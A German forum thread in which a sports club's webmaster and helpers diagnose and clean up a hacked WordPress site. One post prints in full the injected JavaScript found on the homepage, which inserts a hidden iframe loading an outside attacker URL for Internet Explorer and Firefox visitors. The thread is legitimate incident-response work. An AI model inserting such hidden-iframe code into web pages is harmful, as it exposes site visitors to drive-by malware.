Hallo Leute,

und zwar scheint es so als ob wir einen Trojaner auf unserer Vereinswebsite haben. (hxxp://www.ttcelbe.de/)
Es gibt verschiedene Symptome: Virenscanner meldet Viren, Java stürzt ab, WMP öffnet sich plötzlich, kurz nach Öffnen der Seite werden teilweise auch auf den jeweiligen Rechnern Viren gefunden.
Es gab eine Meldung des Trojaners "Exploit-CVE2010-0806" und die IP-Adressen von "hxxp://194.60.242.36/sv/count.php?add=1" bzw. "hxxp://194.60.242.166" werden als schädlich erkannt.
Der Hoster hat bei sich schon einen Virenscan durchgeführt, war aber fehlerfrei.
Könnt ihr mir weiterhelfen?

Viele Grüße
Clemens

Ja, möglich.
Aber eigentlich sollte dies euer Webmaster tun und können.
Man müsste auch wissen, was wurde bereits getan bzw. wurde schon was getan?
Zumindest auf der Startseite befinden sich wohl Code-Reste die dort auf jeden Fall falsch sind - könnte aber die unsaubere und unvollendete Säuberung von der eventuellen Malware sein.

194.60.242.36 ist auf jeden Fall in Sibirien.

Auf welcher Seite kommt denn die Virenwarnung?

Einzige was bisher getan wurde, das Plugin von Google Analytics gelöscht, weil das da stand, als ich auf eine der IP-Adressen gegangen bin, aber hatte wohl eher weniger damit zu tun.

Die Meldung kommt bei jeder Seite, die man öffnet.

Ist ja die Frage, ob unbewusst irgendeine schädliche Datei hochgeladen wurde, die zu löschen ist oder sich jmd eingehackt hat und was eingepflanzt hat.

Möglicherweise/wahrscheinlich sitzt die Malware im "Theme" =>
...ttcelbe.de/wordpress/wp-content/themes/traction_pro/javascripts/ traction . js
Zeile 9

Cool, danke! Das scheint es wirklich gewesen zu sein, die eine Zeile wurde dort neu hinzugefügt und jetzt werden keine Meldungen mehr angezeigt.
Wie bist du auf die Datei gekommen?

Ohne JavaScript war nichts.
Direkte Links und in den Seiten (im Quelltext) sich befindende Scripts (bzw. der Quelltext an sich) schienen sauber zu sein, meinem Auge ist nichts aufgefallen außer auf der Startseite ganz unten nach </body> und </html> befindet sich noch ein </div>. Dies hat dort nichts zu suchen.
Allerdings ist dort unten "gerne" fremder ("illegaler") Content, deshalb habe ich u.a. dort manuell einfach im Quelltext nachgesehen.
Also musste die Malware in einem "externen" Script sein. Und weil mir es zu blöd war da alles manuell zu durchsuchen, habe ich zu meiner Linklesezeichenliste gegriffen.

http://sitecheck.sucuri.net/scanner/

Und die Zeile 9 hat auch (dann) das typische Aussehen eines maliciösen Inhalts gehabt.
BTW:

Zitat:

Description: This malware infects a web site through a compromised desktop (with virus), where it steals any stored password from the FTP client and uses that to attack the site.

Note that every PHP, HTML and JS file can get compromised by this malware. On some variations of this attack, it is also compromised through vulnerable versions of Timthumb/WordPress.

Some anti virus programs will flag this type of malware (after infecting a computer) as Blackhole Exploit kit or similar names.

Affecting: Any web site with FTP enabled (and password stolen).

Clean up: The desktop must be cleaned first. Use multiple AVs if necessary, since this virus is very good at hiding from the current AV that is running. Once it is clean, then you can clean up the sites and change the passwords.

(Desktop bezeichnet hier einen "Desktop-PC")

Achso alles klar, die Seite muss ich mir gleich mal merken ;-)

Ist es jetzt auch am sinnvollsten FTP-PW etc. zu ändern?

Ja, unbedingt das FTP-Passwort (alle!) ändern.

Also die Passwörter aller (!) FTP-Zugänge zu dieser Internet-Präsenz und außerdem sollten ALLE PCs, auf denen ein FTP-Zugang zu dieser Internetpräsenz eingerichtet ist, sorgfältig und tiefgehend überprüft werden und zumindest auf dem ursächlichen PC auch wiederum alle FTP-Passwörter geändert werden.

Hey,
ich muss mich jetzt nach einiger Zeit nochmals melden. Gleiche Website - ähnliches Problem. Ich weiß nicht, ob es noch Überreste der letzten Malware sind oder ob es wieder etwas neues ist. Jedenfalls wurde unsere Website nun von Google gesperrt. Jedoch ist sie (meist) nur im FF nicht erreichbar.
Problem, was ich bisher gefunden habe - fremder Code am Ende der Startseite:

Code: Alles auswählenAufklappen

ATTFilter

<script>var url="hxxp://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}</script>
         

Weiß blos nicht woher der Code stammt. Habe auch schon meinen erhaltenen Webspace nahezu platt gemacht (soweit, dass Wordpress keie Fehler bringt) aber im Quellcode war immernoch die Meldung als Einziges vorhanden und die übrigen Dateien wiesen keine großen Auffälligkeiten auf. Kann ich überhaupt was dagegen machen oder ist mein Hoster betroffen? Denn, wenn ich die ebenfalls infizierten Websites der Google-Diagnoseseite ansehe, sind einige davon ebenfalls beim gleichen Hoster!

Danke für eure Hilfe...
clemixx

Du hättest dir BEVOR du was verändert hattest, einfach mal Datum und Uhrzeit ansehen sollen.

Es ist immer auch ein Möglichkeit, dass ein Hoster eines Multidomainservers tatsächlich auch ein grundlegendes Problem hat, dann sollten aber eher alle Domains/Websites auf mindestens diesem einem Server betroffen sein.

An sich ist meines Wissens dein Hoster aber nicht als dunkleres Schaf (grau oder schwarz) bekannt.
Allerdings können falsche Rechtevergabe und veraltete Serversoftware, PHP-Versionen und darauf aufsetzende Anwendungen schon auch Lücken schaffen. Und mancher Hoster belässt auf alten Verträgen/alten Servern auch längst grob veraltete Software.

Von allen hab ich das nicht getan, aber bei den Hauptdateien war nichts auffälliges.

Ja dächte ich eigentlich auch nicht, aber da es nun doch anscheinend bei einigen Websites diese Probleme gibt und sich der Hoster auch nicht auf meine Nachfragen meldet..! Muss ja auch nur mindestens dieser eine Server betroffen sein..

Noch etwas, was ich an meiner Stelle jetzt tun kann?

Zitat:

Zitat von clemixx

Noch etwas, was ich an meiner Stelle jetzt tun kann?

Augen auf und eine neue Seitenüberprüfung bei Google beantragen.
Du magst einfach mal bei den dir bekannten Websites mit ähnlichem/gleichem Problem schauen, ob sie auf dem selben Server liegen
ping domain-name.tld
Darüber hinaus kontrolliere ob Server-Software (Webserver, PHP etc.) aktuell ist. Wenn nicht, sprich deinen Hoster mal auf eine Aktualisierung an, es ist aber Branchenüblich, dass die Software gerne auf dem Stand des Vertragsabschlusses bleibt (vorallem wenn der alte Vertrag irgendwo besser ist, du also für diese Leistung UND neues PHP (als Beispiel) etwas mehr zahlen musst).

Das klingt alles nach Vorsichtsmaßnahmen, das Ding ist nur, dass die Seite z.Zt. nicht erreichbar ist.
Seitenüberprüfung von Google habe ich auch schon vor mehreren Tagen beantragt, da regt sicht nix. Ist es denn sonst zuverlässig?!
Also der Großteil der betroffenen Websites liegt tatsächlich auf dem gleichen Server.
Ja das ist richtig, die Software ist nicht die aktuellste, könnte man in Zukunft aktualisieren.

Zitat:

Zitat von clemixx

Das klingt alles nach Vorsichtsmaßnahmen, das Ding ist nur, dass die Seite z.Zt. nicht erreichbar ist.
Seitenüberprüfung von Google habe ich auch schon vor mehreren Tagen beantragt, da regt sicht nix. Ist es denn sonst zuverlässig?!

Ich hatte mal eine Kunden-Website - also seit dem habe ich diesen Kunden auch dort als Kunden, vorher nur die PCs - mit solchartiger Malware (ich weiß aber jetzt den echten Hoster nicht mehr, war über einen kleinen Reseller bei einem kleinen Wiederverkäufer der Reseller bei einem größerem Wiederverkäufer ....), da hat Google relativ schnell reagiert, wenn man darauf wartet natürlich eindeutig nicht schnell genug.

Erreichbar ist die Site (technisch) natürlich schon, nur nicht über die Google-Suche und nicht direkt und ohne Warnhinweis über Browser, die sich auf Googles Warnung verlassen.

Naja erreichbar ist sie vlt, aber sollte man ja aufrgund der Malware schon meiden, was?

So nachdem ich im Wordpress-Verzeichnis ewig nach Infektionen gesucht habe, habe ich nun gesehen, dass sich im root noch eine index.php befindet, in der relativ lange Zeichenketten eingebunden waren, die so da nicht hingehörten. Ob die wohl durch ein Plug-In, der (leicht) veralteten Software auf dem Server oder anderes dahin gelangt sind, weiß ich nicht. Aber jetzt sollte es zumindest wieder gehen.